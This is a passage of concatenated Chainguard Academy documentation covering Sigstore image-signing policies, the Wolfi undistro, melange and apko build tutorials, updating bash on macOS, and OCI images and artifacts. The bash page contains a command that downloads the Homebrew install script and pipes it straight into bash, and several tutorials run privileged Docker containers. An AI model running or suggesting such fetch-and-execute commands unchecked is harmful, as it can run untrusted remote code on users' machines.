6bOPWRILRKydTJA6uLKNKmo1/nFm3jvd5tHKOjy4VAQLJ/Vx9wBsAAiLa+06veun Oz3AJ9sNh3wLp21RL11u9TuOKRBipE/TYsBYp8jpIyWPXDSV+JcD/TZqoT8y0Z6S 0damfUmspuK9DTQFL2crpeaqJSG9RA+OuPZLxGD1IMURTsPJB7kXhPtmceeirBnw sVcRHHDitVt8oO/x4Wus1c0CAwEAAQ== -----END PUBLIC KEY----- hashAlgorithm: sha512 Enforce that Chainguard agent is signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: chainguard-agent-is-signed spec: images: - glob: us.gcr.io/prod-enforce-fabc/** authorities: - ctlog: url: https://rekor.sigstore.dev keyless: identities: - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/mono/.github/workflows/.release-drop.yaml@refs/heads/main - issuer: https://token.actions.githubusercontent.com subject: https://github.com/chainguard-dev/mono/.github/workflows/.build-drop.yaml@refs/heads/main url: https://fulcio.sigstore.dev Enforce that Google’s distroless images are signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: google-distroless-signed spec: images: - glob: gcr.io/distroless/static* authorities: - ctlog: url: https://rekor.sigstore.dev keyless: identities: - issuer: https://accounts.google.com subject: keyless@distroless.iam.gserviceaccount.com url: https://fulcio.sigstore.dev Enforce that Istio images are signed apiVersion: policy.sigstore.dev/v1beta1 kind: ClusterImagePolicy metadata: name: istio-signed spec: images: - glob: index.docker.io/istio/* authorities: - key: data: | -----BEGIN PUBLIC KEY----- MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEej5bv2n2vOecKineYGWwq1WaQa7C 7HTEVN+BkNI4D1+66ufzn1eGTrbaC9dceJqCAkhp37vMxhWOrGufpBUokg== -----END PUBLIC KEY----- --- ### Wolfi Overview URL: https://edu.chainguard.dev/open-source/wolfi/overview/ Last Modified: May 2, 2024 Tags: Wolfi, Overview Wolfi is a community Linux undistro designed for the container and cloud-native era. Chainguard started the Wolfi project to build Chainguard Containers, our collection of curated distroless images that meet the requirements of a secure software supply chain. This required a Linux distribution with components at the appropriate granularity and with support for glibc. Building our own undistro also allows us to ensure packages have full provenance and metadata for supporting modern supply-chain security needs. Why Undistro We call Wolfi an undistro because unlike a typical Linux distribution designed to run on bare-metal, Wolfi is a stripped-down distro designed for the cloud-native era. It doesn’t have a kernel of its own, instead relying on the environment (such as the container runtime) to provide one. This separation of concerns in Wolfi means it is adaptable to a range of environments. Wolfi is the base we use to build Chainguard Containers, our open source distroless images that are available free of charge. Wolfi Features Wolfi, whose name was inspired by the world’s smallest octopus, has some key features that differentiates it from other distributions that focus on container/cloud-native environments: Provides a high-quality, build-time SBOM as standard for all packages Packages are designed to be granular and independent, to support minimal images Uses the proven and reliable apk package format Fully declarative and reproducible build system Designed to support glibc Wolfi enables Chainguard to solve the software supply chain security problem from the outside in. It gives developers the secure-by-default base they need to build software, it scales to support organizations running massive environments and provides the control needed to fix most modern supply chain threats. Wolfi builds all packages directly from source, allowing us to fix vulnerabilities or apply customizations that improve the supply chain security posture of everything from compilers to language package managers. Quickstart This site’s Wolfi section contains full information on Wolfi and how to build Wolfi packages, but if you would like to quickly review how to work with Wolfi, try the wolfi-base image. You can run it with: docker run -it cgr.dev/chainguard/wolfi-base This should start a Wolfi container where you can explore the file system and investigate which packages are available. This container is intentionally minimal - it includes the filesystem for Wolfi, a package manager (apk) and a shell, but not much else. You will need to use apk to install any tools you need. Here is an example session: docker run -it cgr.dev/chainguard/wolfi-base ce557598406a:/# cat /etc/os-release ID=wolfi NAME="Wolfi" PRETTY_NAME="Wolfi" VERSION_ID="20230201" HOME_URL="https://wolfi.dev" ce557598406a:/# apk update fetch https://packages.wolfi.dev/os/aarch64/APKINDEX.tar.gz [https://packages.wolfi.dev/os] OK: 15046 distinct packages available ce557598406a:/# curl /bin/sh: curl: not found ce557598406a:/# apk add curl (1/5) Installing libbrotlicommon1 (1.0.9-r3) (2/5) Installing libbrotlidec1 (1.0.9-r3) (3/5) Installing libnghttp2-14 (1.55.1-r0) (4/5) Installing libcurl-openssl4 (8.2.1-r0) (5/5) Installing curl (8.2.1-r0) OK: 13 MiB in 19 packages ce557598406a:/# curl google.com ... --- ### Getting Started with melange URL: https://edu.chainguard.dev/open-source/build-tools/melange/getting-started-with-melange/ Last Modified: August 1, 2024 Tags: melange, Procedural melange is an apk builder tool that uses declarative pipelines to create apk packages. From a single YAML file, users are able to generate multi-architecture apks that can be injected directly into apko builds. Understanding melange can help you better understand the Wolfi operating system and how Chainguard Containers are made to be minimal and secure, but it is not necessary to have a background in melange in order to use Chainguard Containers. In this guide, you’ll learn how to build a software package with melange. To demonstrate the versatile combination of melange and apko builds, we’ll package a small command-line PHP script and build a minimalist container image based on Wolfi with the generated apk. All files used in this demo are open source and available at the melange-php-demos repository. Requirements Our guide is compatible with operating systems that support Docker and shared volumes. Please follow the appropriate Docker installation instructions for your operating system. You won’t need PHP or Composer installed on your system, since we’ll be using Docker to build the demo app. Note for Linux Users In order to be able to build apks for multiple architectures using Docker, you may need to register additional QEMU headers within your kernel. This is done automatically for Docker Desktop users, so if you are on macOS you don’t need to run this additional step. Run the following command to register the necessary handlers within your kernel, using the multiarch/qemu-user-static image. docker run --rm --privileged multiarch/qemu-user-static --reset -p yes You should now be able to build apks for all architectures supported by melange. 1 — Downloading the melange Image The fastest way to get melange up and running on your system is by using the official melange image with Docker. Start by pulling the melange image into your local system: docker pull cgr.dev/chainguard/melange:latest This will download the latest version of the melange image, which is rebuilt every night for extra freshness. Check that you’re able to run melange with docker run. docker run --rm cgr.dev/chainguard/melange version You should get output similar to the following: __ __ _____ _ _ _ _ ____ _____ | \/ | | ____| | | / \ | \ | | / ___| | ____| | |\/| | | _| | | / _ \ | \| | | | _ | _| | | | | | |___ | |___ / ___ \ | |\ | | |_| | | |___ |_| |_| |_____| |_____| /_/ \_\ |_| \_| \____| |_____| melange GitVersion: v0.11.1 GitCommit: a52edcc075ebf1dc89aea87893e3821944171ee3 GitTreeState: clean BuildDate: '2024-07-19T16:04:17Z' GoVersion: go1.22.5 Compiler: gc Platform: linux/amd64 With melange installed, you’re ready to proceed. 2 — Cloning the Demo Repository To demonstrate melange’s features with a minimalist application that has real-world functionality, our demo consists of a PHP command line app that queries the Slip advice API and outputs a random piece of advice. The app is a single-file script built with Minicli. Start by cloning the demo repository to your local machine and navigating to the melange-php-demos/hello-minicli directory: git clone git@github.com:chainguard-dev/melange-php-demos.git cd melange-php-demos/hello-minicli Run the following command, which will use the official Composer image to generate a composer.json file and download minicli/minicli: docker run --rm -it -v "${PWD}":/app composer require minicli/minicli Once you receive confirmation that the download was completed, you’ll need a second dependency to query the Advice Slip API. Run the following command to include minicli/curly, a curl wrapper for Minicli: docker run --rm -it -v "${PWD}":/app composer require minicli/curly Now you can run the application to make sure it’s functional. You can do that using Docker and Chainguard’s PHP image: docker run --rm -it -v "${PWD}":/app cgr.dev/chainguard/php /app/minicli advice You should get a random piece of advice such as: Gratitude is said to be the secret to happiness. With the application ready, you can start building your package. 3 — The melange YAML File The melange.yaml file is where you declare the details and specifications of your apk package. For code that generates self-contained binaries, this is typically where you’ll build your application artifacts with compiler tools. In the case of interpreted languages, you’ll likely build your application by downloading vendor dependencies, setting up relevant paths, and setting the environment up for production. The melange specification file contains three main sections: package: defines package specs, such as name, license, and runtime dependencies. Runtime dependencies will be brought into the system automatically as dependencies when the apk is installed. environment: defines how the environment should be prepared for the build, including required packages and their source repositories. Anything that is only required at build time goes here, and shouldn’t be part of the runtime dependencies. pipeline: defines the build pipeline for this package. One of the best advantages of using melange is to be able to control all steps of your build pipeline, and include only what’s necessary. This way, you’ll be able to build smaller and more secure container images by removing unnecessary dependencies. This is what the melange.yaml included in our demo looks like, for your reference: package:name:hello-minicliversion:0.1.0description:Minicli melange demotarget-architecture:- allcopyright:- license:MITdependencies:runtime:- php- php-curlenvironment:contents:keyring:- https://packages.wolfi.dev/os/wolfi-signing.rsa.pub- ./melange.rsa.pubrepositories:- https://packages.wolfi.dev/ospackages:- ca-certificates-bundle- busybox- curl- git- php- php-phar- php-iconv- php-openssl- php-curl- composerpipeline:- name:Build Minicli applicationruns:|MINICLI_HOME="${{targets.destdir}}/usr/share/minicli" EXEC_DIR="${{targets.destdir}}/usr/bin" mkdir -p "${MINICLI_HOME}" "${EXEC_DIR}" cp ./composer.json "${MINICLI_HOME}" /usr/bin/composer install -d "${MINICLI_HOME}" --no-dev cp ./minicli "${EXEC_DIR}" chmod +x "${EXEC_DIR}/minicli"Our build pipeline will set up two distinct directories, separating the application dependencies from its executable entry point. The executable minicli script will be copied into /usr/bin, while the vendor files will be located at /usr/share/minicli. 4 — Building the minicli apk with melange Before building the package, you’ll need to create a temporary keypair to sign it. You can use the following command for that: docker run --rm -v "${PWD}":/work cgr.dev/chainguard/melange keygen This will generate a melange.rsa and melange.rsa.pub files in the current directory. 2024/08/01 16:55:31 INFO generating keypair with a 4096 bit prime, please wait... 2024/08/01 16:55:33 INFO wrote private key to melange.rsa 2024/08/01 16:55:33 INFO wrote public key to melange.rsa.pub Next, build the apk defined in the melange.yaml file with the following command: docker run --privileged --rm -v "${PWD}":/work \ cgr.dev/chainguard/melange build melange.yaml \ --arch amd64,aarch64 \ --signing-key melange.rsa This will set up a volume sharing your current folder with the location /work inside the container. We’ll build packages for amd64 and aarch64 platforms and sign them using the melange.rsa key created in the previous command. When the build is finished, you should be able to find a packages folder containing the generated apks (and associated apk index files): packages ├── aarch64 │ ├── APKINDEX.json │ ├── APKINDEX.tar.gz │ └── hello-minicli-0.1.0-r0.apk └── x86_64 ├── APKINDEX.json ├── APKINDEX.tar.gz └── hello-minicli-0.1.0-r0.apk 3 directories, 6 files You have successfully built a multi-architecture software package with melange! 5 — Building a Container Image with apko With the apk packages and apk index in place, you can now build a container image and have your apk(s) installed within it. The following apko.yaml file will create a container image tailored to the application we built in the previous steps. Because we defined the PHP dependencies as runtime dependencies within the apk, you don’t need to require these packages again here. The container entrypoint command will be set to /usr/bin/minicli, where the application executable is located. One important thing to note is how we reference the hello-minicli apk as a local package within the repositories section of the YAML file. The @local notation tells apko to search for apks in the specified directory, in this case /work/packages. This is what the apko.yaml file included in our demo looks like, for your reference: contents:keyring:- https://packages.wolfi.dev/os/wolfi-signing.rsa.pub- ./melange.rsa.pubrepositories:- https://packages.wolfi.dev/os- '@local /work/packages'packages:- wolfi-base- ca-certificates-bundle- hello-minicli@localaccounts:groups:- groupname:nonrootgid:65532users:- username:nonrootuid:65532run-as:65532entrypoint:command:/usr/bin/minicli adviceThe following command will set up a volume sharing your current folder with the location /work in the apko container, running the apko build command to generate an image based on your apko.yaml definition file. docker run --rm --workdir /work -v ${PWD}:/work cgr.dev/chainguard/apko \ build apko.yaml hello-minicli:test hello-minicli.tar --arch host This will build an OCI image based on your host system’s architecture (specified by the --arch host flag). If you receive warnings at this point, those are likely related to the types of SBOMs being uploaded and can be safely ignored. The command will generate a few new files in the app’s directory: hello-minicli.tar — the packaged OCI image that can be imported with a docker load command sbom-%host-architecture%.spdx.json — an SBOM file for your host architecture in spdx-json format Next, load your image within Docker: docker load < hello-minicli.tar 7cbaefdf1c30: Loading layer 13.7MB/13.7MB Loaded image: hello-minicli:test-%host-architecture% Note that the %host-architecture% will vary, and there may be multiple images loaded into your Docker daemon. Be sure to edit the variable in the following docker run command to match your target architecture. Now you can run your Minicli program with: docker run --rm hello-minicli:test-%host-architecture% The demo should output an advice slip such as: Only those who attempt the impossible can achieve the absurd. You have successfully built a minimalist container image with your apk package installed on it. This image is fully OCI compatible and can be signed with Cosign for provenance attestation. Conclusion In this guide, we packaged a PHP command-line app with melange. We also built a container image to install and run our custom apk, using the apko tool. For more information about apko, check our Getting Started with apko guide. The demo files are available at the melange-php-demos repository, in the hello-minicli subfolder. For additional information on how to debug your builds and other features, check the melange and apko repositories on GitHub. --- ### Getting Started with apko URL: https://edu.chainguard.dev/open-source/build-tools/apko/getting-started-with-apko/ Last Modified: May 2, 2024 Tags: apko, Procedural apko is a command-line tool to build container images using a declarative language based on YAML. apko is so named as it uses the apk package format and is inspired by the ko build tool. It is part of the open source tooling Chainguard developed to create the Wolfi operating system which is used in Chainguard Containers. Why apko Container images are typically assembled in multiple steps. A tool like Docker, for example, combines building steps (as in, running commands to copy files, build and deploy applications) and composition (as in, composing a base image with pre-built packages) in a single piece of software. apko, on the other hand, is solely a composition tool that focuses on producing lightweight, “flat” base images that are fully reproducible and contain auto generated SBOM files for every successful build. Instead of building your application together with your components and system dependencies, you can build your application once and compose it into different architectures and distributions, using a tool such as melange in combination with apko. For more information on how melange and apko work together, you can check this blog post: Secure your Software Factory with melange and apko. In this guide, we’ll learn how to use apko to build a base Wolfi image. Requirements The fastest way to get apko up and running on your system is by using the official apko image with Docker. This method is compatible with all operating systems that support Docker and shared volumes. Please follow the appropriate Docker installation instructions for your operating system. If you want to run apko on CI/CD pipelines built on top of GitHub Actions, check the apko build action on GitHub. The instructions in this document were validated on an Ubuntu 22.04 workstation running Docker 20.10. Step 1 — Download the apko Image Start by pulling the official apko image into your local system: docker pull cgr.dev/chainguard/apko This will download the latest version of the distroless apko image, which is rebuilt every night for extra freshness. Check that you’re able to run apko with: docker run --rm cgr.dev/chainguard/apko version You should get output similar to this: _ ____ _ __ ___ / \ | _ \ | |/ / / _ \ / _ \ | |_) | | ' / | | | | / ___ \ | __/ | . \ | |_| | /_/ \_\ |_| |_|\_\ \___/ apko GitVersion: v0.6.0 ... In the next step, you’ll build your first apko image. Step 2 — Build a Test Image To test that you’re able to build images, you can use one of the example yaml definition files that are included in the official apko code repository. Here we’ll use the wolfi-base.yaml for demonstration. Create a new folder to save your image files, them move to that directory: mkdir ~/apko cd ~/apko Next, create a file named wolfi-base.yaml to save your image definition. You can use nano for that: nano wolfi-base.yaml The wolfi-base.yaml example image is defined as follows: contents:keyring:- https://packages.wolfi.dev/os/wolfi-signing.rsa.pubrepositories:- https://packages.wolfi.dev/ospackages:- ca-certificates-bundle- wolfi-baseentrypoint:command:/bin/sh -larchs:- x86_64The contents node is used to define allowed package sources and which packages should be included in the image. Here we’ll be using only packages from the main Wolfi APK repository. In the packages section, we require the wolfi-base package, which is a meta-package to set up a bare minimum Wolfi system. The command field within the entrypoint node defines the image entry point command /bin/sh -l, which will land you in a shell prompt whenever the image is executed. Finally, the archs node specifies that this image will be built for the x86-64 architecture. Save and close the file after you’re done including these contents. With nano, you can do that by pressing CTRL+X, then confirming with Y and ENTER. The only thing left to do now is run apko to build this image. The following build command will: set up a volume share in the current directory, synchronizing its contents with apko’s image workdir; this way, the generated artifacts will be available on your host system. execute the cgr.dev/chainguard/apko image with the build command, tagging the image as wolfi-base:test-amd64 and saving the build as wolfi-test.tar. docker run --rm -v ${PWD}:/work -w /work cgr.dev/chainguard/apko build wolfi-base.yaml wolfi-base:test wolfi-test.tar You should get output similar to this: . . . Mar 15 20:17:02.023 [INFO] [arch:x86_64] Building images for 1 architectures: [amd64] Mar 15 20:17:02.023 [INFO] [arch:x86_64] building tags [wolfi-base:test] . . . Mar 15 20:17:04.261 [INFO] loading config file: wolfi-base.yaml Mar 15 20:17:04.416 [INFO] [arch:x86_64] adding amd64 to index Mar 15 20:17:04.419 [INFO] [arch:x86_64] Generating index SBOM Mar 15 20:17:04.420 [INFO] [arch:x86_64] Final index tgz at: wolfi-test.tar From the output, you can notice that the image was successfully built as wolfi-test.tar in the container, which is shared with your local folder on the host thanks to the volume you created when running the docker run command. Step 3 — Test the Image with Docker To test the generated image with Docker, you’ll need to use the docker load command and import the .tar file you created in the previous step: docker load < wolfi-test.tar You’ll get output like this: bf6e72d71c13: Loading layer [==================================================>] 5.491MB/5.491MB Loaded image: wolfi-base:test-amd64 You can check that the image is available at the host system with: docker image list You should be able to find the wolfi-base image with the test-amd64 tag among the results. Now you can run the image with: docker run -it wolfi-base:test-amd64 This will get you into a container running the apko-built image wolfi-base:test-amd64. It’s a regular shell that you can explore to see what’s included - just keep in mind that this is a minimalist image with only the base Wolfi system. To include additional software packages, check the Wolfi repository to find the packages you’ll need for your specific use case, or check out melange, apko’s companion project that allows users to build their own APK packages from source. Conclusion In this guide, you learned what apko is and what makes it a powerful resource in your cloud-native tooling. If you need help debugging your build, check our Troubleshooting apko page for more information. Check the official apko repository if you want to report an issue or suggest new features. --- ### Updating bash on macOS URL: https://edu.chainguard.dev/open-source/update-bash-macos/ Last Modified: June 9, 2022 The bash release included with macOS (v3.2) needs to be updated for Chainguard scripts. You’ll need to install a newer release and ensure it appears before /bin/bash in $PATH. Prerequisites We’ll want to check the version of bash, and also ensure that the Homebrew package manager is installed. If you know your bash version is below 4 and that you have Homebrew installed, you can skip this section. First, make sure your version is version 3.2 and that it hasn’t been updated. bash --version You’ll receive output similar to the following: GNU bash, version 3.2.57(1)-release (arm64-apple-darwin21) Copyright (C) 2007 Free Software Foundation, Inc. If your output is anything lower than version 4, as above, you’ll need to install a newer version of bash. Next, you’ll need to have Homebrew installed as a package manager for your macOS machine. You can read more about Homebrew from their official site. You can check whether Homebrew is already installed by checking its version: brew --version If you don’t get output of a version number (such as Homebrew 3.4.4), you can install Homebrew with the following command: /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" With Homebrew installed and set up, you’re ready to update bash on macOS. Update Homebrew and Install a Newer Version of bash Let’s update Homebrew to ensure we have the most recent version and go ahead and install Homebrew’s most recent version of bash. brew update && brew install bash You should get output regarding updated packages. At this point, you should be able to check to see which versions of bash you currently have installed. List all the available versions with which and the “all” -a flag. which -a bash Your output will likely be two different versions of bash — the one that was preinstalled on your machine, and the new Homebrew version. /opt/homebrew/bin/bash /bin/bash However, if you run which bash without a flag, you will likely just receive the /bin/bash output, which means your machine is still using the preinstalled bash rather than the one you just added with Homebrew. We need to modify this. Update Bash Profile In order to call the right version of bash, you’ll need to update your bash profile. In most macOS machines, you should be able to find this under ~/.bash_profile. You can edit this with Vi, for example. vi ~/.bash_profile In the file, you’re going to want to add a line that sets up the PATH to direct to the Homebrew directory that you received above from the which -a bash output. export PATH="/opt/homebrew/bin:$PATH" In our case, the new bash was in the directory path of /opt/homebrew/bin so we have exported that to PATH, as above. After inserting the line, you may save and quit Vi. At this point, you can either restart your Terminal or source your Bash Profile so that the changes take place. Let’s do the latter. source ~/.bash_profile Once you have done this, you should get a clear command prompt. Verify macOS is Using the New Version of bash With your PATH updated, you should be able to use the new version of bash on your macOS machine. You can confirm that your operating system is pulling the correct version by running the which command again. which bash Your output now should reflect the path where Homebrew installed the new version of bash and that you added to the Bash Profile. In our example, our output would be the following. /opt/homebrew/bin/bash You can further confirm that you’re using the updated bash by checking the version. bash --version You should receive output indicating that you are using version 4 or 5 of bash. GNU bash, version 5.1.16(1)-release (aarch64-apple-darwin21.1.0) Copyright (C) 2020 Free Software Foundation, Inc. ... If you are not pulling from the correct location or are not running the expected version, please review the steps above to ensure that you did not introduce extra characters. Your Homebrew package manager may be configured to a different path; ensure that it is set up as you expect. --- ### What is the Open Container Initiative? URL: https://edu.chainguard.dev/open-source/oci/what-is-the-oci/ Last Modified: June 9, 2022 Tags: OCI, Conceptual The Open Container Initiative (OCI) is a Linux Foundation project dedicated to managing specifications and projects related to the storage, distribution, and execution of container images. The OCI was formed in 2015 when developers recognized that the quickly growing container industry needed standards to ensure the portability of containers across systems and platforms. As one of the most popular container developers, Docker was a key partner in the formation of the OCI and donated its specifications and associated code for OCI image formats and runtime specifications. Today, the OCI manages three specifications (the Image Specification, the Runtime Specification, and the Distribution Specification), which are evolving according to community participation and industry development. The OCI is committed to promoting common, minimal, and open standards and specifications with the aim of protecting interoperability without sacrificing developers’ ability to innovate. These standards and specifications play a critical role in enabling developers to trust that their containers will work regardless of the infrastructure, cloud provider, and DevOps tooling they choose to use. They also are vital in modern software supply chain security as they provide a strong foundation for developing security tooling and best practices related to container technology. Understanding the purpose and use of OCI specifications can help you understand the conditions of container interoperability and prepare you to learn emerging methods for securing and trusting container applications. What are the OCI Specifications? The OCI currently manages three specifications: the Runtime Specification, the Image Specification, and the Distribution Specification. These specifications work together to ensure that any OCI-compliant image can be run on any OCI-compliant runtime, and that OCI-compliant registries (such as Docker, Amazon Elastic Container Registry, or Google Container Registry) are able to distribute OCI images according to OCI guidelines. The OCI offers a testing and peer validation process for individuals and organizations to certify their images or runtime software as OCI compliant. You can find information about the certification process on the OCI website. The three OCI specifications are outlined in the following sections. OCI Image Format Specification This specification defines an OCI Image as consisting of an image manifest, an optional image index, a set of filesystem layers, and a configuration. Image manifest This document provides a configuration and set of layers for a single container image for a specific architecture and operating system. Note that the manifest specification has three goals: Enabling content-addressable images, which means an image can be referred to by a unique ID — or digital fingerprint — that is generated by hashing its contents. Hashing is generated using the SHA256 algorithm, which generates a unique 32-byte signature for an image based on the contents of the image. Changing even one byte on the original image would result in a different hash, enabling developers to know with certainty that an image has not been altered. Allowing multi-architecture images, or container images that can be used with different architectures such as AMD64 and ARM. Multi-architecture images enable a flexible approach to developing a container-based application or setting up CI/CD workflows without needing to commit to a specific architecture. Ensuring that images are compatible with any OCI-compliant runtime. For an example manifest document and a list of properties, you can read the OCI’s Image Manifest Specifications. Image index (optional) This document is an optional higher-level manifest which allows developers to point to multiple image manifests to allow compatibility with a variety of architectures and operating systems. For an example image index and a list of properties, you can read the OCI’s Image Index specifications. A set of filesystem layers An image is composed of one or more filesystem layers, each of which represent a change to the file system such as the addition of another image or one or more commands. These layers are unpacked by the container engine to build the image and are referred to by their digest, a hash generated by applying the SHA 256 algorithm to their contents. Layers are described in the image manifest as follows: "layers": [ { "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "size": 32654, "digest": "sha256:9834876dcfb05cb167a5c24953eba58c4ac89b1adf57f28f2f9d09af107ee8f0" }, ] For OCI guidance on filesystem layers, you can visit their Image Layer Filesystem Changeset Documentation. Configuration The configuration document includes basic information like the author and creation date and describes execution parameters for translating the image to a container runtime. The configuration file is named after its cryptographic hash and can be located in the manifest as follows: { "schemaVersion": 2, "mediaType": "application/vnd.oci.image.manifest.v1+json", "config": { "mediaType": "application/vnd.oci.image.config.v1+json", "size": 7023, "digest": "sha256:b5b2b2c507a0944348e0303114d8d93aaaa081732b86451d9bce1f432a537bc7" }, For more guidance on image configuration, visit the official OCI documentation. Runtime Specification A container runtime is the software used to run and manage containers; essentially they create and run containers using specified images. The goal of the OCI Runtime Specification is to ensure consistency between different runtime environments and define common actions to manage a container’s lifecycle. An OCI-compliant image should run reliably on any OCI-compliant runtime. More information about the Runtime Specification can be found in the OCI documentation. In addition to overseeing this specification, OCI develops the runtime runc, a command line client for creating, configuring, and managing containers. Originally developed by Docker, runc was donated to OCI as the reference for the specification and serves as the foundation for a variety of popular container tools such as containerd and Podman. Distribution Specification The OCI Distribution Specification aims to standardize the way container registries and runtime tools push and pull container images and other content types. It is based on the specification for the Docker Registry HTTP API V2 protocol apdx-1, and has been adopted by major registries such as Amazon Elastic Container Registry, Google Container Registry, Azure Container Registry, and Github Container Registry. Any registry that is OCI-compliant supports interactions outlined by this specification, such as pushing, pulling, or storing images. More information about the Distribution Specification can be found in the OCI documentation here. How to know if an image is OCI compliant Currently, most images encountered in the wild are either OCI or Docker images. You can determine whether an image is OCI compliant by inspecting the mediatype value located in the image’s manifest. If “oci” is included in the string set as the value of the mediatype, then it is an OCI image: "mediaType": "application/vnd.oci.image.manifest.v1+json", Otherwise, the mediatype string will likely include “docker” as follows: "mediaType": "application/vnd.docker.distribution.manifest.v2+json" There are a few interesting nuances about OCI images that are worth pointing out. First, because Docker donated its image specifications to OCI, Docker and OCI image specifications are the same in substance. In fact, most images on Docker are Docker images and not OCI images, which you can confirm by inspecting the image manifests. This is largely due to the fact that Docker’s tools for publishing and building images create Docker images – not OCI images — by default, a convention set by historical practice. If you want to build and publish OCI images, you must use tools that support OCI, such as apko, an open source OCI image builder. Relatedly, a final nuance to point out is that OCI-compliant registries are only required to support OCI images, but may distribute other image types as well. Thus, you should not expect all images distributed on an OCI-compliant registry to be OCI compliant themselves, such as evidenced by Docker Hub in the example above. Wrap up You should now understand the purpose of OCI and the three container specifications it oversees. While the OCI’s core function is protecting interoperability across the complex container ecosystem, its protocols are being recognized as useful for signing software, a method for authenticating that the software is from a trusted source and has not been tampered with by a third party. You can learn more about container signing and how to sign, verify, and store image artifacts in an OCI registry in our introductory guide to Cosign. --- ### What are OCI Artifacts? URL: https://edu.chainguard.dev/open-source/oci/what-are-oci-artifacts/ Last Modified: June 9, 2022 Tags: OCI, Conceptual OCI artifacts are a way of using OCI registries, or container registries that are compliant with specifications set by the Open Container Initiative, to store arbitrary files. They are useful to understand given their growing importance for software supply chain security and their general utility for container engineering. However, community usage of OCI artifacts is still actively evolving and differing opinions and understandings of their purpose can lead to confusion. In this guide, you will learn the difference between OCI “artifacts” and “Artifacts,” their utility for software supply chain security, and some important considerations when using them. OCI “artifacts” versus “Artifacts” The term “OCI artifact” is a general purpose way of referring to any object stored within a container registry, but is most often used to refer to objects stored in registries that are not images. Container registries were originally designed to store and distribute images, but software engineers soon saw their utility for storing non-image objects such as Helm charts, Tekton bundles, and policy modules. By storing these objects in the same infrastructure as their containers, software engineers are able to consolidate their security and management efforts. Another benefit of using OCI registries for artifacts is that registries provide a content-addressable API, or a way of referring to files (like images and artifacts) that assures their authenticity and integrity. OCI artifacts are sometimes misunderstood as a new OCI specification or format but they are in fact a way of using the OCI Image Specification to store something other than an image in a container registry. Some software projects use OCI registries to store non-images without making any formal changes to the object’s manifest. However, the OCI does provide guidance for formally specifying an object as an “OCI Artifact” (note the capital “A”) by modifying its manifest in a particular way. According to the OCI Image Specification, an image manifest needs to include the OCI mediaTypes values application/vnd.oci.image.config.v1+json and application/vnd.oci.image.layer.v1.tar+gzip in the config and layers fields. When creating a manifest for an OCI Artifact, however, you switch out both of these values with custom mediaTypes values as in the example below. { "schemaVersion": 2, "config": { "mediaType": "application/vnd.yourcustomartifact+json", "size": 233, "digest": "sha245:..." }, "layers": [{ "mediaType": "application/vnd.yourcustomartifact.tar.gzip", "size": 680, "digest": "sha245:..." }] } In the example manifest above, the config field contains the custom mediaType value application/vnd.yourcustomartifact+json and the layers fields contains the custom mediaType value application/vnd.yourcustomartifact.tar.gzip. Some container tools make use of the OCI Artifacts format guidelines (such as Helm and Tekton), but using these guidelines comes with a serious drawback. Not all registries support OCI Artifacts (or manifests with a custom mediaType), and the OCI Image Specification recommends avoiding the use of Artifacts if you are concerned about portability. As you will read about in the section below, this lack of portability is a reason why some software projects choose to store artifacts in an OCI registry without adding a custom mediaType to the manifest. OCI artifacts and software supply chain security For software supply chain security, OCI artifacts offer a useful way to store SBOMs and signatures inside a container registry. An SBOM, or software bill of materials, is a formally structured list of libraries, modules, licensing, and version information that make up any given piece of software. When a security advisory is issued, SBOMs enable software operators to quickly understand whether their codebase contains any components associated with the vulnerability described in the advisory. A signature is a way of attesting to the fact that you are the author of your software, and enables the consumer to verify that the signature and software have not been tampered with by a third party. The open source tool Cosign, part of the Sigstore project, enables software engineers to store their SBOMs and signatures as artifacts in the same container registry where they store their associated images. However, given the lack of support for OCI Artifacts across registries, Cosign ships all SBOM and signature artifacts as OCI Images and not as OCI Artifacts. In this way, software engineers can take advantage of Cosign regardless of whether their container registry supports the OCI Artifact manifest format or not. To learn more about storing signatures as artifacts, visit the section on counter signing in the Cosign repo. To learn more about storing SBOMs as artifacts, visit the Cosign SBOM Specification page on Github or the section on signing SBOMs in Sigstore’s documentation. Considerations Community usage and guidance of OCI artifacts and Artifacts are actively evolving and there are a few considerations to keep in mind when you are planning on using them. As noted earlier, not all registries support OCI Artifacts, and the OCI Image Specification recommends avoiding the use of them if you are concerned about portability. Recommended practices are still also under debate, giving rise to the OCI Reference Types Working Group, which is considering different ways of describing and handling objects stored in an OCI registry. You can read a more about the proposals the group is currently considering by visiting the Intro to OCI Reference Types post on Chainguard’s blog. --- ### Troubleshooting melange Builds URL: https://edu.chainguard.dev/open-source/build-tools/melange/troubleshooting/ Last Modified: August 10, 2022 Tags: melange, Troubleshooting Debug Options To include debug-level information on melange builds, edit your melange.yaml file and include set -x in your pipeline. You can add this flag at any point of your pipeline commands to further debug a specific section of your build. ...pipeline:- name:Build Minicli applicationruns:|set -x APP_HOME="${{targets.destdir}}/usr/share/hello-minicli"...Common Errors When melange is unable to finish a build successfully, you will get an error similar to this: Error: failed to build package: unable to run pipeline: exit status 127 The build could not be completed due to an error at some point of your pipeline. Enable debug by including set -x at the beginning of your build pipeline so that you can nail down where the issue occurs. Missing QEMU user-space emulation packages Linux users using the Docker melange image may get errors when building packages for other architectures than x86 and x86_64. This won’t happen for Docker Desktop users, since the additional architectures are automatically enabled upon installation. To enable additional architectures, you’ll need to enable them within your kernel with the following command: docker run --rm --privileged multiarch/qemu-user-static --reset -p yes An alternate approach to achieve the same result is to run the following command: docker run --privileged --rm tonistiigi/binfmt --install all Missing build-time dependencies You may get errors from missing build-time dependences such as busybox. In this case you may get “No such file or directory” errors when enabling debug with set -x. To fix this, you’ll need to locate which package has the commands that your build needs, and add it to the list of your build-time dependencies. Further Resources For additional guidance, please refer to the melange repository on GitHub, where you can find more examples or open an issue in case of problems. --- ### An Introduction to Fulcio URL: https://edu.chainguard.dev/open-source/sigstore/fulcio/an-introduction-to-fulcio/ Last Modified: August 19, 2022 Tags: Fulcio, Overview An earlier version of this material was published in the Fulcio chapter of the Linux Foundation Sigstore course. Fulcio is a certificate authority that binds public keys to identities such as email addresses (such as a Google account) using OpenID Connect, essentially notarizing a short-lived key pair against a particular login. A certificate authority issues digital certificates that certify that a particular public key is owned by a particular entity. The certificate authority therefore serves as a trusted third party, helping 